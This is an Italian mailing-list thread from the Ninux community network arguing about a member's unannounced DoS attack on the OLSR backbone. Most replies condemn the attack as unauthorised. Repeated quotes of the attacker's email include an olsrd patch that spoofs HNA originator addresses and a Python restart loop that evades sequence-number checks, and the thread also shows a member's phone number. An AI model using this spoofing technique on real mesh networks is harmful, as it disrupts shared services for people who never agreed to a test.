> Detto ciò non avere fretta di sentirti tu il diretto interessato
> dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
> difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
> un servizio è centralizzato è più semplice da identificare ed attaccare
>
> Quindi, sì Buona Domenica ;)
>
> *--
> Arka*
>
>
>
> Il giorno 25 maggio 2014 12:27, Andrea Pescetelli <
> andrea.pescete...@gmail.com> ha scritto:
>
>> Non è sminuendo la cosa che si risolve il problema.
>> Dove andare a colpire in un azione premeditata?
>> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
>> fanno gsoc e scambiano opinioni.
>> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
>> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
>> girarci anche il blog che gyardacaso non approva.
>> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
>> il mail server di Nino?
>> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
>> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
>> quindo oltre al culo per sistemare pura la presa per il culo a fare la
>> caccia alle streghe di un danno provocato senza avviso.
>>
>> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
>> danno provocato e torno a ripetere che un provvedimento simbolico va preso.
>> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.
>>
>> Se per voi questa è ninux allora non utilizzate i servizi che non
>> approvate e fate un passo indietro.
>>
>>
>>
>>
>> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
>> arkant...@gmail.com> ha scritto:
>>
>> Hola!
>>>
>>> Fish hai ragione dobbiamo fare qualcosa!!
>>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
>>> macellaio utilizzare un coltello.
>>> Cosa dovremmo aver acquisito alla luce di ciò?
>>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe
>>> una strage!
>>>
>>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha
>>> voglia (e capacità) può farci male.
>>>  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
>>> sicuramente non avvisino prima di agire!
>>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
>>> bestemmiare, insomma ... non si fa ;)
>>>
>>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
>>> costruircela. A volte non basta fare il link migliore per poter dire di
>>> avere una struttura solida.
>>> Abbiamo anche bisogno di un motore che spinga!
>>>
>>> E poi ricordiamoci che ninux fa rima con relax!
>>>
>>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
>>> essere controllabile)
>>>
>>> Bella && Buona Domenica @tutti
>>>
>>> *--
>>> Arka*
>>>
>>>
>>>
>>> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
>>> andrea.pescete...@gmail.com> ha scritto:
>>>
>>> Ciao
 Vorrei chiedere di prendere provvedimenti seri a seguito di questi
 eventi e comportamenti che da una settimana stanno invalidando sia il
 rispetto reciproco sia il buon finzionamento della rete stessa da parte di
 Saverio Proto.
 Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha
 scritto:

>  Non è qualche ora. Va avanti da giovedì mattina.
> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
> Jabber è stato ko da giovedì per sta cosa.
> Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
>
>> Ciao,
>>
>> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
>> informazioni tecniche interessanti.
>>
>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>
>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>
>> diff --git a/src/build_msg.c b/src/build_msg.c
>> index 109f955..e252981 100644
>> --- a/src/build_msg.c
>> +++ b/src/build_msg.c
>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>m = (union olsr_message *)msg_buffer;
>>
>>/* Fill header */
>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>> +  struct in_addr fakesource;
>> +  fakesource.s_addr = 0;
>> +  //inet_hton(2956867021,&fakesource);
>

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Alessandro (aka ArkaNet)
Perdona(te) il replay ma è doveroso...

1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
in un 'attacco' simile
2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
né sul mapserver né sul wiki

Detto ciò non avere fretta di sentirti tu il diretto interessato
dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
un servizio è centralizzato è più semplice da identificare ed attaccare

Quindi, sì Buona Domenica ;)

*--
Arka*



Il giorno 25 maggio 2014 12:27, Andrea Pescetelli <
andrea.pescete...@gmail.com> ha scritto:

> Non è sminuendo la cosa che si risolve il problema.
> Dove andare a colpire in un azione premeditata?
> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
> fanno gsoc e scambiano opinioni.
> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
> girarci anche il blog che gyardacaso non approva.
> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
> il mail server di Nino?
> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
> quindo oltre al culo per sistemare pura la presa per il culo a fare la
> caccia alle streghe di un danno provocato senza avviso.
>
> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
> danno provocato e torno a ripetere che un provvedimento simbolico va preso.
> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.
>
> Se per voi questa è ninux allora non utilizzate i servizi che non
> approvate e fate un passo indietro.
>
>
>
>
> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
> arkant...@gmail.com> ha scritto:
>
> Hola!
>>
>> Fish hai ragione dobbiamo fare qualcosa!!
>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
>> macellaio utilizzare un coltello.
>> Cosa dovremmo aver acquisito alla luce di ciò?
>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
>> strage!
>>
>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
>> (e capacità) può farci male.
>>  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
>> sicuramente non avvisino prima di agire!
>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
>> bestemmiare, insomma ... non si fa ;)
>>
>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
>> costruircela. A volte non basta fare il link migliore per poter dire di
>> avere una struttura solida.
>> Abbiamo anche bisogno di un motore che spinga!
>>
>> E poi ricordiamoci che ninux fa rima con relax!
>>
>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
>> essere controllabile)
>>
>> Bella && Buona Domenica @tutti
>>
>> *--
>> Arka*
>>
>>
>>
>> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
>> andrea.pescete...@gmail.com> ha scritto:
>>
>> Ciao
>>> Vorrei chiedere di prendere provvedimenti seri a seguito di questi
>>> eventi e comportamenti che da una settimana stanno invalidando sia il
>>> rispetto reciproco sia il buon finzionamento della rete stessa da parte di
>>> Saverio Proto.
>>> Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha
>>> scritto:
>>>
  Non è qualche ora. Va avanti da giovedì mattina.
 Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
 Jabber è stato ko da giovedì per sta cosa.
 Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:

> Ciao,
>
> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
> informazioni tecniche interessanti.
>
> bravi, avete risolto il problema in fretta :) Ho volutamente provato
> un attacco DoS sul backbone per capire che effetto poteva avere.
>
> ecco la patch di olsrd con cui generavo l'attacco DoS
>
> diff --git a/src/build_msg.c b/src/build_msg.c
> index 109f955..e252981 100644
> --- a/src/build_msg.c
> +++ b/src/build_msg.c
> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>m = (union olsr_message *)msg_buffer;
>
>/* Fill header */
> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
> +  struct in_addr fakesource;
> +  fakesource.s_addr = 0;
> +  //inet_hton(2956867021,&fakesource);
> +  inet_aton("172.16.40.40",&fakesource);
> +  m->v4.originator = fakesource.s_addr;
>m->v4.hopcnt = 0;
>m->v4.ttl = MAX_TTL;
>m->v4.olsr_msgtype = HNA_MESSAGE;
>
>
> una domanda,
>
> se avessi patchato anche:
>
> m->v4.hopcnt = XXX
>
> mettendo numeri casuali..
>
> sarebbe stato altrettanto facile capire chi è che iniettava questi
> messaggi ?
>
> mi sto diverte

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Andrea Pescetelli
Arka Buona Domenica anche a te
Perdona la dimenticanza.
Il 25/mag/2014 12:27 "Andrea Pescetelli"  ha
scritto:

> Non è sminuendo la cosa che si risolve il problema.
> Dove andare a colpire in un azione premeditata?
> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
> fanno gsoc e scambiano opinioni.
> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
> girarci anche il blog che gyardacaso non approva.
> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
> il mail server di Nino?
> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
> quindo oltre al culo per sistemare pura la presa per il culo a fare la
> caccia alle streghe di un danno provocato senza avviso.
>
> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
> danno provocato e torno a ripetere che un provvedimento simbolico va preso.
> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.
>
> Se per voi questa è ninux allora non utilizzate i servizi che non
> approvate e fate un passo indietro.
>
>
>
>
> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
> arkant...@gmail.com> ha scritto:
>
>> Hola!
>>
>> Fish hai ragione dobbiamo fare qualcosa!!
>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
>> macellaio utilizzare un coltello.
>> Cosa dovremmo aver acquisito alla luce di ciò?
>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
>> strage!
>>
>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
>> (e capacità) può farci male.
>>  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
>> sicuramente non avvisino prima di agire!
>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
>> bestemmiare, insomma ... non si fa ;)
>>
>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
>> costruircela. A volte non basta fare il link migliore per poter dire di
>> avere una struttura solida.
>> Abbiamo anche bisogno di un motore che spinga!
>>
>> E poi ricordiamoci che ninux fa rima con relax!
>>
>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
>> essere controllabile)
>>
>> Bella && Buona Domenica @tutti
>>
>> *--
>> Arka*
>>
>>
>>
>> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
>> andrea.pescete...@gmail.com> ha scritto:
>>
>> Ciao
>>> Vorrei chiedere di prendere provvedimenti seri a seguito di questi
>>> eventi e comportamenti che da una settimana stanno invalidando sia il
>>> rispetto reciproco sia il buon finzionamento della rete stessa da parte di
>>> Saverio Proto.
>>> Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha
>>> scritto:
>>>
  Non è qualche ora. Va avanti da giovedì mattina.
 Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
 Jabber è stato ko da giovedì per sta cosa.
 Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:

> Ciao,
>
> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
> informazioni tecniche interessanti.
>
> bravi, avete risolto il problema in fretta :) Ho volutamente provato
> un attacco DoS sul backbone per capire che effetto poteva avere.
>
> ecco la patch di olsrd con cui generavo l'attacco DoS
>
> diff --git a/src/build_msg.c b/src/build_msg.c
> index 109f955..e252981 100644
> --- a/src/build_msg.c
> +++ b/src/build_msg.c
> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>m = (union olsr_message *)msg_buffer;
>
>/* Fill header */
> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
> +  struct in_addr fakesource;
> +  fakesource.s_addr = 0;
> +  //inet_hton(2956867021,&fakesource);
> +  inet_aton("172.16.40.40",&fakesource);
> +  m->v4.originator = fakesource.s_addr;
>m->v4.hopcnt = 0;
>m->v4.ttl = MAX_TTL;
>m->v4.olsr_msgtype = HNA_MESSAGE;
>
>
> una domanda,
>
> se avessi patchato anche:
>
> m->v4.hopcnt = XXX
>
> mettendo numeri casuali..
>
> sarebbe stato altrettanto facile capire chi è che iniettava questi
> messaggi ?
>
> mi sto divertendo parecchio con questi attacchi DoS, sono molto
> istruttivi. Per chi vuole giocare insieme a me a programmare in C
> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
> che vorrei provare è DrDoS su snmp).
>
> un problema di questo attacco sono cmq i sequence number. Per rendere
> l'attacco efficace ho dovuto far andare la mia instanza patchata di
> OLSR a singhiozzo:
>
> import os
> import time
>
> while True:
> os.system("olsrd")
> print "started\n"
> time.sleep(120)
> os.system("killall olsrd

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Andrea Pescetelli
Non è sminuendo la cosa che si risolve il problema.
Dove andare a colpire in un azione premeditata?
I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
fanno gsoc e scambiano opinioni.
Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta anche
casa mia dove forse per qualche motivo in un futuro avrebbe potuto girarci
anche il blog che gyardacaso non approva.
Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
il mail server di Nino?
Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
quindo oltre al culo per sistemare pura la presa per il culo a fare la
caccia alle streghe di un danno provocato senza avviso.

No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
danno provocato e torno a ripetere che un provvedimento simbolico va preso.
Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.

Se per voi questa è ninux allora non utilizzate i servizi che non approvate
e fate un passo indietro.




Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
arkant...@gmail.com> ha scritto:

> Hola!
>
> Fish hai ragione dobbiamo fare qualcosa!!
> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
> macellaio utilizzare un coltello.
> Cosa dovremmo aver acquisito alla luce di ciò?
> Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
> strage!
>
> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
> (e capacità) può farci male.
> I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
> sicuramente non avvisino prima di agire!
> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
> bestemmiare, insomma ... non si fa ;)
>
> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
> costruircela. A volte non basta fare il link migliore per poter dire di
> avere una struttura solida.
> Abbiamo anche bisogno di un motore che spinga!
>
> E poi ricordiamoci che ninux fa rima con relax!
>
> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
> essere controllabile)
>
> Bella && Buona Domenica @tutti
>
> *--
> Arka*
>
>
>
> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
> andrea.pescete...@gmail.com> ha scritto:
>
> Ciao
>> Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi
>> e comportamenti che da una settimana stanno invalidando sia il rispetto
>> reciproco sia il buon finzionamento della rete stessa da parte di Saverio
>> Proto.
>> Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha
>> scritto:
>>
>>>  Non è qualche ora. Va avanti da giovedì mattina.
>>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>>> Jabber è stato ko da giovedì per sta cosa.
>>> Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
>>>
 Ciao,

 Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
 informazioni tecniche interessanti.

 bravi, avete risolto il problema in fretta :) Ho volutamente provato
 un attacco DoS sul backbone per capire che effetto poteva avere.

 ecco la patch di olsrd con cui generavo l'attacco DoS

 diff --git a/src/build_msg.c b/src/build_msg.c
 index 109f955..e252981 100644
 --- a/src/build_msg.c
 +++ b/src/build_msg.c
 @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
m = (union olsr_message *)msg_buffer;

/* Fill header */
 -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
 +  struct in_addr fakesource;
 +  fakesource.s_addr = 0;
 +  //inet_hton(2956867021,&fakesource);
 +  inet_aton("172.16.40.40",&fakesource);
 +  m->v4.originator = fakesource.s_addr;
m->v4.hopcnt = 0;
m->v4.ttl = MAX_TTL;
m->v4.olsr_msgtype = HNA_MESSAGE;


 una domanda,

 se avessi patchato anche:

 m->v4.hopcnt = XXX

 mettendo numeri casuali..

 sarebbe stato altrettanto facile capire chi è che iniettava questi
 messaggi ?

 mi sto divertendo parecchio con questi attacchi DoS, sono molto
 istruttivi. Per chi vuole giocare insieme a me a programmare in C
 possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
 che vorrei provare è DrDoS su snmp).

 un problema di questo attacco sono cmq i sequence number. Per rendere
 l'attacco efficace ho dovuto far andare la mia instanza patchata di
 OLSR a singhiozzo:

 import os
 import time

 while True:
 os.system("olsrd")
 print "started\n"
 time.sleep(120)
 os.system("killall olsrd")
 print "killed\n"
 time.sleep(300)

 in quanto avevo bisogno che i miei sequence number dovevano sempre
 essere piu bassi di quelli del spoofato, altrimenti venivano scartati
 come out of sequence.

 vi va di scriv

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Alessandro (aka ArkaNet)
Hola!

Fish hai ragione dobbiamo fare qualcosa!!
Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
macellaio utilizzare un coltello.
Cosa dovremmo aver acquisito alla luce di ciò?
Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
strage!

Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
(e capacità) può farci male.
I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
sicuramente non avvisino prima di agire!
Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
bestemmiare, insomma ... non si fa ;)

Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
costruircela. A volte non basta fare il link migliore per poter dire di
avere una struttura solida.
Abbiamo anche bisogno di un motore che spinga!

E poi ricordiamoci che ninux fa rima con relax!

Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
essere controllabile)

Bella && Buona Domenica @tutti

*--
Arka*



Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
andrea.pescete...@gmail.com> ha scritto:

> Ciao
> Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi
> e comportamenti che da una settimana stanno invalidando sia il rispetto
> reciproco sia il buon finzionamento della rete stessa da parte di Saverio
> Proto.
> Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha
> scritto:
>
>> Non è qualche ora. Va avanti da giovedì mattina.
>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>> Jabber è stato ko da giovedì per sta cosa.
>> Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
>>
>>> Ciao,
>>>
>>> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
>>> informazioni tecniche interessanti.
>>>
>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>
>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>
>>> diff --git a/src/build_msg.c b/src/build_msg.c
>>> index 109f955..e252981 100644
>>> --- a/src/build_msg.c
>>> +++ b/src/build_msg.c
>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>>m = (union olsr_message *)msg_buffer;
>>>
>>>/* Fill header */
>>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>> +  struct in_addr fakesource;
>>> +  fakesource.s_addr = 0;
>>> +  //inet_hton(2956867021,&fakesource);
>>> +  inet_aton("172.16.40.40",&fakesource);
>>> +  m->v4.originator = fakesource.s_addr;
>>>m->v4.hopcnt = 0;
>>>m->v4.ttl = MAX_TTL;
>>>m->v4.olsr_msgtype = HNA_MESSAGE;
>>>
>>>
>>> una domanda,
>>>
>>> se avessi patchato anche:
>>>
>>> m->v4.hopcnt = XXX
>>>
>>> mettendo numeri casuali..
>>>
>>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>>> messaggi ?
>>>
>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>> che vorrei provare è DrDoS su snmp).
>>>
>>> un problema di questo attacco sono cmq i sequence number. Per rendere
>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>> OLSR a singhiozzo:
>>>
>>> import os
>>> import time
>>>
>>> while True:
>>> os.system("olsrd")
>>> print "started\n"
>>> time.sleep(120)
>>> os.system("killall olsrd")
>>> print "killed\n"
>>> time.sleep(300)
>>>
>>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>> come out of sequence.
>>>
>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>> parte di come ti costruisce l'attacco e voi la parte di come avete
>>> fatto ad identificare il nodo spoofato ?
>>>
>>> ho staccatto il nodo attaccante, il gioco è finito :)
>>>
>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>>
>>> ciao :)
>>>
>>> Saverio
>>>
>>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>>  ha scritto:
>>> > Saverio,
>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr
>>> hna
>>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>> > proveniente dal nodo in oggetto.
>>> >
>>> > Questo problema sta oscurando diversi servizi di ninux in farm
>>> appartenenti
>>> > a quella subnet.
>>> >
>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>>> > multipli.
>>> > puoi verificare?
>>> >
>>> > Grazie
>>> >
>>> > Fish, Hispanico, Halino
>>> > --
>>> > Andrea Pescetelli aka Fish
>>> > Skype: andrea5742
>>> > Ninux int: 5001/5002
>>> > Mobile: +39 3891156050
>>> >
>>> >
>>> >
>>> >
>>>
>>
>> ___
>> Wireless mailing list
>> Wireless@ml.ninux.org
>> http://ml.ninux.org/mailman/listinfo/wireless
>>
>>

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Alessandro Gnagni
Appunto. Inoltre non c'è una soluzione.
Hai creato un bug senza però fornire una cura.
Più che uno scherzo è un comportamento criminale.
Il 25/mag/2014 10:15 "Netsoul"  ha scritto:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA512
>
> Una volta queste cose venivano organizzate. Certo, il gestore non doveva
> conoscere la metodologia, ma almeno l'arco temporale in cui si sarebbero
> svolti i pentest. Almeno a me così hanno insegnato. Farlo "al buio"  e poi
> vantarsi di averlo deliberatamente fatto vuol dire aver  mettesso in
> difficoltà persone che magari proprio in quell'arco temporale avevano
> bisogno della rete o più semplicemente stavano cercando di risolvere
> piccoli bug (che poi non capisci se è stato il tuo bug a fottere la rete o
> la rete che fotte te)
> Boh, forse sbaglio io eh! Ma "ai miei tempi"  se volevi fare una cosa
> fatta bene e professionale avvisavi e poi postavi l'eventuale dump a
> beneficio di tutti...
> Netsoul
>
>
> >> Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
> >>
> >>> Ciao,
> >>>
> >>> Metto in Cc: anche wireless@ml.ninux.org perché questa email
> >contiene
> >>> informazioni tecniche interessanti.
> >>>
> >>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
> >>> un attacco DoS sul backbone per capire che effetto poteva avere.
> >>>
> >>> ecco la patch di olsrd con cui generavo l'attacco DoS
> >>>
>
> - -- Inviato dal mio cellulare Android con K-9 Mail.
> -BEGIN PGP SIGNATURE-
> Version: APG v1.1.1
>
> iQFBBAEBCgArBQJTgaYyJBxOZXRTb3VsIDxoYWNrZXJyZWRlbnRpQG91dGxvb2su
> Y29tPgAKCRDuE4w04YrhfHwiB/kBXMdNd5CT26oDFn3Hz0hHKQPew/rNiJyaevON
> oeCJcXKU+giY1vmBjr0Y6xS5sOqbwTElvEpI5M4baHlysTG9FuBkAPd+j2AloiuV
> FE4IkbqSCtawO8d7MjPdHdt3JxFIRlEr0p576fPFhyiKzR1QQtsITA4C0qZXL1NA
> l7eC32twCGIfiB6/GTnuMJMWfDSoDMzVwLxDIXjAhnoOdfy7UJOtQx9C6dLVA47b
> esx7rymWrO3Lyv1krDt8wFMOxZD9chn4+qoUb2t1XyfwGfeMEwuboFlufadpZGcm
> bXxU/1Nk/EtFcX72k1F6sJJRLqgvVLSJSl0YpufkE4sd51zk
> =Cnhl
> -END PGP SIGNATURE-
>
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Netsoul
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Una volta queste cose venivano organizzate. Certo, il gestore non doveva 
conoscere la metodologia, ma almeno l'arco temporale in cui si sarebbero svolti 
i pentest. Almeno a me così hanno insegnato. Farlo "al buio"  e poi vantarsi di 
averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà persone che 
magari proprio in quell'arco temporale avevano bisogno della rete o più 
semplicemente stavano cercando di risolvere piccoli bug (che poi non capisci se 
è stato il tuo bug a fottere la rete o la rete che fotte te)
Boh, forse sbaglio io eh! Ma "ai miei tempi"  se volevi fare una cosa fatta 
bene e professionale avvisavi e poi postavi l'eventuale dump a beneficio di 
tutti...
Netsoul


>> Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
>>
>>> Ciao,
>>>
>>> Metto in Cc: anche wireless@ml.ninux.org perché questa email
>contiene
>>> informazioni tecniche interessanti.
>>>
>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>
>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>

- -- Inviato dal mio cellulare Android con K-9 Mail.
-BEGIN PGP SIGNATURE-
Version: APG v1.1.1

iQFBBAEBCgArBQJTgaYyJBxOZXRTb3VsIDxoYWNrZXJyZWRlbnRpQG91dGxvb2su
Y29tPgAKCRDuE4w04YrhfHwiB/kBXMdNd5CT26oDFn3Hz0hHKQPew/rNiJyaevON
oeCJcXKU+giY1vmBjr0Y6xS5sOqbwTElvEpI5M4baHlysTG9FuBkAPd+j2AloiuV
FE4IkbqSCtawO8d7MjPdHdt3JxFIRlEr0p576fPFhyiKzR1QQtsITA4C0qZXL1NA
l7eC32twCGIfiB6/GTnuMJMWfDSoDMzVwLxDIXjAhnoOdfy7UJOtQx9C6dLVA47b
esx7rymWrO3Lyv1krDt8wFMOxZD9chn4+qoUb2t1XyfwGfeMEwuboFlufadpZGcm
bXxU/1Nk/EtFcX72k1F6sJJRLqgvVLSJSl0YpufkE4sd51zk
=Cnhl
-END PGP SIGNATURE-

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Daniela Ruggeri
se lo scopo è testare la rete per renderla inattaccabile, non c'e' bisogno di 
farlo all'improvviso e di nascosto.
Basta riservare un giorno avvisando in anticipo che in tale ora verranno fatti 
dei test di attacco senza rivelare subito il tipo di attacco, per vedere cosa 
succede e in caso decidere tutti insieme su come effettuare il rimedio

E' ingiusto attaccare, creare il panico  e aspettare che gli altri trovino il 
rimedio

Ciao :-)
Daniela


 
Key GPG ID: AA2DA887

Un guerriero accetta la sua parte, qualunque possa essere, e l'accetta in 
assoluta umilta'. Accetta in umilta' cio' che egli e', e non ne fa motivo di 
rimpianto ma di sfida. Io conosco soltanto l’umilta' del guerriero, e questa 
non mi permettera' mai di schiavizzare qualcuno. 
Carlos Castaneda.
Il Domenica 25 Maggio 2014 9:37, Andrea Pescetelli 
 ha scritto:
 


Ciao
Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi e 
comportamenti che da una settimana stanno invalidando sia il rispetto reciproco 
sia il buon finzionamento della rete stessa da parte di Saverio Proto.
Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha scritto:


Non è qualche ora. Va avanti da giovedì mattina.
>Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>Jabber è stato ko da giovedì per sta cosa. 
